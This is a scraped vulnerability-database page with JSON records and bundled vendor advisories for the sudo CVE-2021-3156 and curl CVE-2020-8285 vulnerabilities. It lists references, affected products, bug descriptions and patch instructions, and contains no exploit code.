        "id": "161139"
      },
      {
        "db": "PACKETSTORM",
        "id": "161137"
      },
      {
        "db": "PACKETSTORM",
        "id": "161141"
      },
      {
        "db": "PACKETSTORM",
        "id": "161163"
      },
      {
        "db": "PACKETSTORM",
        "id": "161142"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3156"
      }
    ]
  },
  "id": "VAR-202101-1926",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-383931"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2026-03-09T22:27:02.630000Z",
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-193",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-383931"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3156"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.2,
        "url": "http://www.openwall.com/lists/oss-security/2021/01/26/3"
      },
      {
        "trust": 1.1,
        "url": "https://www.kb.cert.org/vuls/id/794544"
      },
      {
        "trust": 1.1,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sudo-privesc-jan2021-qnyqfcm"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20210128-0001/"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20210128-0002/"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/kb/ht212177"
      },
      {
        "trust": 1.1,
        "url": "https://www.sudo.ws/stable.html#1.9.5p2"
      },
      {
        "trust": 1.1,
        "url": "https://www.synology.com/security/advisory/synology_sa_21_02"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2021/dsa-4839"
      },
      {
        "trust": 1.1,
        "url": "http://seclists.org/fulldisclosure/2021/jan/79"
      },
      {
        "trust": 1.1,
        "url": "http://seclists.org/fulldisclosure/2021/feb/42"
      },
      {
        "trust": 1.1,
        "url": "https://security.gentoo.org/glsa/202101-33"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/161160/sudo-heap-based-buffer-overflow.html"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/161230/sudo-buffer-overflow-privilege-escalation.html"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/161270/sudo-1.9.5p1-buffer-overflow-privilege-escalation.html"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/161293/sudo-1.8.31p2-1.9.5p1-buffer-overflow.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.beyondtrust.com/blog/entry/security-advisory-privilege-management-for-unix-linux-pmul-basic-and-privilege-management-for-mac-pmm-affected-by-sudo-vulnerability"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com//security-alerts/cpujul2021.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2021/01/msg00022.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2021/01/27/1"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2021/01/27/2"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2021/02/15/1"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/14/2"
      },
      {
        "trust": 1.0,
        "url": "http://seclists.org/fulldisclosure/2024/feb/3"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/cala5ftxiqbrryua2zqnjxb6oqmaxeii/"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2024/01/30/6"
      },
      {
        "trust": 1.0,
        "url": "https://www.vicarius.io/vsociety/posts/sudoedit-pwned-cve-2021-3156"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/176932/glibc-syslog-heap-based-buffer-overflow.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2024/01/30/8"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/lhxk6ico5aylgfk2tax5mzkuxtukwojy/"
      },
      {
        "trust": 1.0,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10348"
      },
      {
        "trust": 1.0,
        "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2021-3156"
      },
      {
        "trust": 0.8,
        "url": "cve-2021-3156  "
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3156"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-002"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-3156"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10348"
      },
      {
        "trust": 0.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/lhxk6ico5aylgfk2tax5mzkuxtukwojy/"
      },
      {
        "trust": 0.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/cala5ftxiqbrryua2zqnjxb6oqmaxeii/"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/sudo"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2974891"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25686"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25685"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25684"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25685"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-001"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0401"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25686"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25684"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0225"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0220"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0227"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4705-2"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4705-1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0224"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#794544"
      },
      {
        "db": "VULHUB",
        "id": "VHN-383931"
      },
      {
        "db": "PACKETSTORM",
        "id": "168983"
      },
      {
        "db": "PACKETSTORM",
        "id": "161281"
      },
      {
        "db": "PACKETSTORM",
        "id": "161139"
      },
      {
        "db": "PACKETSTORM",
        "id": "161137"
      },
      {
        "db": "PACKETSTORM",
        "id": "161141"
      },
      {
        "db": "PACKETSTORM",
        "id": "161163"
      },
      {
        "db": "PACKETSTORM",
        "id": "161142"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3156"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#794544",
        "ident": null
      },
      {
        "db": "VULHUB",
        "id": "VHN-383931",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168983",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161281",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161139",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161137",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161141",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161163",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161142",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3156",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2021-02-04T00:00:00",
        "db": "CERT/CC",
        "id": "VU#794544",
        "ident": null
      },
      {
        "date": "2021-01-26T00:00:00",
        "db": "VULHUB",
        "id": "VHN-383931",
        "ident": null
      },
      {
        "date": "2021-01-28T20:12:00",
        "db": "PACKETSTORM",
        "id": "168983",
        "ident": null
      },
      {
        "date": "2021-02-03T16:36:53",
        "db": "PACKETSTORM",
        "id": "161281",
        "ident": null
      },
      {
        "date": "2021-01-27T14:06:12",
        "db": "PACKETSTORM",
        "id": "161139",
        "ident": null
      },
      {
        "date": "2021-01-27T14:05:54",
        "db": "PACKETSTORM",
        "id": "161137",
        "ident": null
      },
      {
        "date": "2021-01-27T14:06:28",
        "db": "PACKETSTORM",
        "id": "161141",
        "ident": null
      },
      {
        "date": "2021-01-28T13:59:34",
        "db": "PACKETSTORM",
        "id": "161163",
        "ident": null
      },
      {
        "date": "2021-01-27T14:06:37",
        "db": "PACKETSTORM",
        "id": "161142",
        "ident": null
      },
      {
        "date": "2021-01-26T21:15:12.987000",
        "db": "NVD",
        "id": "CVE-2021-3156",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2021-04-26T00:00:00",
        "db": "CERT/CC",
        "id": "VU#794544",
        "ident": null
      },
      {
        "date": "2022-09-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-383931",
        "ident": null
      },
      {
        "date": "2025-11-10T14:41:45.053000",
        "db": "NVD",
        "id": "CVE-2021-3156",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168983"
      },
      {
        "db": "PACKETSTORM",
        "id": "161163"
      }
    ],
    "trust": 0.2
  },
  "title": {
    "_id": null,
    "data": "Sudo set_cmd() is vulnerable to heap-based buffer overflow",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#794544"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "overflow, root",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168983"
      },
      {
        "db": "PACKETSTORM",
        "id": "161139"
      },
      {
        "db": "PACKETSTORM",
        "id": "161137"
      },
      {
        "db": "PACKETSTORM",
        "id": "161141"
      },
      {
        "db": "PACKETSTORM",
        "id": "161142"
      }
    ],
    "trust": 0.5
  }
}

VAR-202012-1278

Vulnerability from variot - Updated: 2026-03-09 22:04

curl 7.21.0 to and including 7.73.0 is vulnerable to uncontrolled recursion due to a stack overflow issue in FTP wildcard match parsing. HAXX libcurl is an open source client-side URL transfer library developed by Haxx (HAXX) in Sweden. The product supports protocols such as FTP, SFTP, TFTP and HTTP. A security vulnerability exists in libcurl that could be exploited by an attacker to trigger a fatal error via libcurl's FTP wildcards, thereby triggering a denial of service. A security issue was found in curl versions 7.21.0 up to and including 7.73.0. libcurl offers a wildcard matching functionality, which allows a callback (set with CURLOPT_CHUNK_BGN_FUNCTION) to return information back to libcurl on how to handle a specific entry in a directory when libcurl iterates over a list of all available entries. When this callback returns CURL_CHUNK_BGN_FUNC_SKIP, to tell libcurl to not deal with that file, the internal function in libcurl then calls itself recursively to handle the next directory entry. If there's a sufficient amount of file entries and if the callback returns "skip" enough number of times, libcurl runs out of stack space. The exact amount will of course vary with platforms, compilers and other environmental factors. The content of the remote directory is not kept on the stack, so it seems hard for the malicious user to control exactly what data that overwrites the stack - however it remains a Denial-Of-Service vector as a malicious user who controls a server that a libcurl-using application works with under these premises can trigger a crash. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.2.4 images

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana gement_for_kubernetes/2.2/html/release_notes/

Security fixes:

redisgraph-tls: redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms (CVE-2021-21309)
console-header-container: nodejs-netmask: improper input validation of octal input data (CVE-2021-28092)
console-container: nodejs-is-svg: ReDoS via malicious string (CVE-2021-28918)

Bug fixes:

RHACM 2.2.4 images (BZ# 1957254)
Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 (BZ#1950832)
ACM Operator should support using the default route TLS (BZ# 1955270)
The scrolling bar for search filter does not work properly (BZ# 1956852)
Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)
The proxy setup in install-config.yaml is not worked when IPI installing with RHACM (BZ# 1960181)
Unable to make SSH connection to a Bitbucket server (BZ# 1966513)
Observability Thanos store shard crashing - cannot unmarshall DNS message (BZ# 1967890)
Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):

1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms 1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string 1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data 1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory 1954506 - [DDF] Table does not contain data about 20 clusters. Now it's difficult to estimate CPU usage with larger clusters 1954535 - Reinstall Submariner - No endpoints found on one cluster 1955270 - ACM Operator should support using the default route TLS 1956852 - The scrolling bar for search filter does not work properly 1957254 - RHACM 2.2.4 images 1959426 - Limits on Length of MultiClusterObservability Resource Name 1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM. 1963128 - [DDF] Please rename this to "Amazon Elastic Kubernetes Service" 1966513 - Unable to make SSH connection to a Bitbucket server 1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error. 1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP8 security update Advisory ID: RHSA-2021:2471-01 Product: Red Hat JBoss Core Services Advisory URL: https://access.redhat.com/errata/RHSA-2021:2471 Issue date: 2021-06-17 CVE Names: CVE-2020-8169 CVE-2020-8284 CVE-2020-8285 CVE-2020-8286 CVE-2021-22876 CVE-2021-22890 CVE-2021-22901 CVE-2021-31618 =====================================================================

Summary:

Red Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 8 zip release for RHEL 7, RHEL 8 and Microsoft Windows is available.

Description:

This release adds the new Apache HTTP Server 2.4.37 Service Pack 8 packages that are part of the JBoss Core Services offering.

This release serves as a replacement for Red Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 7 and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes and enhancements included in this release.

Security Fix(es):

curl: Use-after-free in TLS session handling when using OpenSSL TLS backend (CVE-2021-22901)
httpd: NULL pointer dereference on specially crafted HTTP/2 request (CVE-2021-31618)
libcurl: partial password leak over DNS on HTTP redirect (CVE-2020-8169)
curl: FTP PASV command response can cause curl to connect to arbitrary host (CVE-2020-8284)
curl: Malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used (CVE-2020-8285)
curl: Inferior OCSP verification (CVE-2020-8286)
curl: Leak of authentication credentials in URL via automatic Referer (CVE-2021-22876)
curl: TLS 1.3 session ticket mix-up with HTTPS proxy host (CVE-2021-22890)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.

The References section of this erratum contains a download link for the update. You must be logged in to download the update.

Bugs fixed (https://bugzilla.redhat.com/):

1847916 - CVE-2020-8169 libcurl: partial password leak over DNS on HTTP redirect 1902667 - CVE-2020-8284 curl: FTP PASV command response can cause curl to connect to arbitrary host 1902687 - CVE-2020-8285 curl: Malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used 1906096 - CVE-2020-8286 curl: Inferior OCSP verification 1941964 - CVE-2021-22876 curl: Leak of authentication credentials in URL via automatic Referer 1941965 - CVE-2021-22890 curl: TLS 1.3 session ticket mix-up with HTTPS proxy host 1963146 - CVE-2021-22901 curl: Use-after-free in TLS session handling when using OpenSSL TLS backend 1968013 - CVE-2021-31618 httpd: NULL pointer dereference on specially crafted HTTP/2 request

References:

https://access.redhat.com/security/cve/CVE-2020-8169 https://access.redhat.com/security/cve/CVE-2020-8284 https://access.redhat.com/security/cve/CVE-2020-8285 https://access.redhat.com/security/cve/CVE-2020-8286 https://access.redhat.com/security/cve/CVE-2021-22876 https://access.redhat.com/security/cve/CVE-2021-22890 https://access.redhat.com/security/cve/CVE-2021-22901 https://access.redhat.com/security/cve/CVE-2021-31618 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=core.service.apachehttp&downloadType=securityPatches&version=2.4.37 https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=core.service.openssl&downloadType=securityPatches&version=1.1.1g https://access.redhat.com/documentation/en-us/red_hat_jboss_core_services/2.4.37/

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBYMszstzjgjWX9erEAQgW2Q//cZOMa4KOvz7KejR03sHk7m8aMHDRdPDe Ki6PTe99phprmuXNPOCPGFuWDXbdpAlyEx3Elt3Ah+vmpV+K7ThwXGXJkGwb6mol 2xAFvcwxxO6GNsCl8gYW+JTG+5HYLZ/U4q3lgHId9qfzmuRRg0zwOuwZC7y7R6kP 3H1o1WRiIKEA1oHCh3f3OizTrkOcBZsWINsJ2ggW+ZqVeve4PJH55F3JwCJbIuhd kUhe1QQjiANWq4m/+QkTRtIYzahqK+lIubpoU5P+sFosc7ASUGe29ZPC9LsfY4hx 61bSxXbxTv2wcBaUrg/TAxRplQdHRbZe8s8eWhMtDoNHRqujYOiKHUnBgdoY6oLd 3gfAGI3w2NnWRDodGDGXfuDu6hncAukvxqOO/tOnRd2n7/R52ewGCsNKvsf/OHRG 1X7UeD4DJvXiqBNOtPaqOjR3q7xdO5MhYtkvh/8mzvhx5X/CojUWRWmtSdJDhpvQ POl+hJjFqEFTUJk/VGDJ7HsIs5OqeoV0pURP3VvYyBF75xp3aYI8Gfb1wLoqXmp2 iFhSTskqEc42iMvG/Ks5Rb1wQLrJ4RNgxunGofmNQusjgN406aAqvE79a6JUmt/z 7Z6i8Tvy9PGgNtbnalyxbikpA8Qcoxoij2pbIcSNIJXW+mA74QtI3AC4+4m0V90H butyhmDY1nQ= =gsJD -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted automatically. Applications using the APR libraries, such as httpd, must be restarted for this update to take effect. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

Gentoo Linux Security Advisory GLSA 202012-14

                                        https://security.gentoo.org/

Severity: Normal Title: cURL: Multiple vulnerabilities Date: December 23, 2020 Bugs: #737990, #759259 ID: 202012-14

Synopsis

Multiple vulnerabilities have been found in cURL, the worst of which could result in information disclosure or data loss.

Background

A command line tool and library for transferring data with URLs.

Affected packages

 -------------------------------------------------------------------
  Package              /     Vulnerable     /            Unaffected
 -------------------------------------------------------------------

1 net-misc/curl < 7.74.0 >= 7.74.0

Description

Multiple vulnerabilities have been discovered in cURL. Please review the CVE identifiers referenced below for details.

Impact

Please review the referenced CVE identifiers for details.

Workaround

There is no known workaround at this time.

Resolution

All cURL users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.74.0"

References

[ 1 ] CVE-2020-8231 https://nvd.nist.gov/vuln/detail/CVE-2020-8231 [ 2 ] CVE-2020-8284 https://nvd.nist.gov/vuln/detail/CVE-2020-8284 [ 3 ] CVE-2020-8285 https://nvd.nist.gov/vuln/detail/CVE-2020-8285 [ 4 ] CVE-2020-8286 https://nvd.nist.gov/vuln/detail/CVE-2020-8286

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/202012-14

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

APPLE-SA-2021-04-26-2 macOS Big Sur 11.3

macOS Big Sur 11.3 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT212325.

curl Available for: macOS Big Sur Impact: A remote attacker may be able to cause a denial of service Description: A buffer overflow was addressed with improved input validation. CVE-2020-8285: xnynx

Installation note:

This update may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/

Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

. ========================================================================== Ubuntu Security Notice USN-4665-2 December 09, 2020

curl vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 14.04 ESM
Ubuntu 12.04 ESM

Summary:

Several security issues were fixed in curl.

Software Description: - curl: HTTP, HTTPS, and FTP client and client libraries

Details:

USN-4665-1 fixed several vulnerabilities in curl. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM.

Original advisory details:

Varnavas Papaioannou discovered that curl incorrectly handled FTP PASV responses. An attacker could possibly use this issue to trick curl into connecting to an arbitrary IP address and be used to perform port scanner and other information gathering. (CVE-2020-8284)

It was discovered that curl incorrectly handled FTP wildcard matchins. (CVE-2020-8285)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: curl 7.35.0-1ubuntu2.20+esm6 libcurl3 7.35.0-1ubuntu2.20+esm6 libcurl3-gnutls 7.35.0-1ubuntu2.20+esm6 libcurl3-nss 7.35.0-1ubuntu2.20+esm6

Ubuntu 12.04 ESM: curl 7.22.0-3ubuntu4.29 libcurl3 7.22.0-3ubuntu4.29 libcurl3-gnutls 7.22.0-3ubuntu4.29 libcurl3-nss 7.22.0-3ubuntu4.29

In general, a standard system update will make all the necessary changes

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202012-1278",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "model": "hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "libcurl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.21.0"
      },
      {
        "model": "essbase",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "21.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "m12-2s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "model": "clustered data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.12"
      },
      {
        "model": "macos",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.3"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15.7"
      },
      {
        "model": "communications billing and revenue management",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.0.0.3.0"
      },
      {
        "model": "sinec infrastructure network services",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0.1.1"
      },
      {
        "model": "macos",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.0"
      },
      {
        "model": "m10-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "model": "m10-4s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "model": "mac os x",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.14.6"
      },
      {
        "model": "m10-4",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "model": "universal forwarder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.1.0"
      },
      {
        "model": "libcurl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.74.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.6"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.58"
      },
      {
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.0"
      },
      {
        "model": "m12-2",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.0"
      },
      {
        "model": "m12-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "model": "mac os x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15.7"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "m10-4",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "model": "mac os x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.14.6"
      },
      {
        "model": "m12-2",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "model": "m12-2s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "model": "hci bootstrap os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "m12-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "model": "m10-4s",
        "scope": "lt",
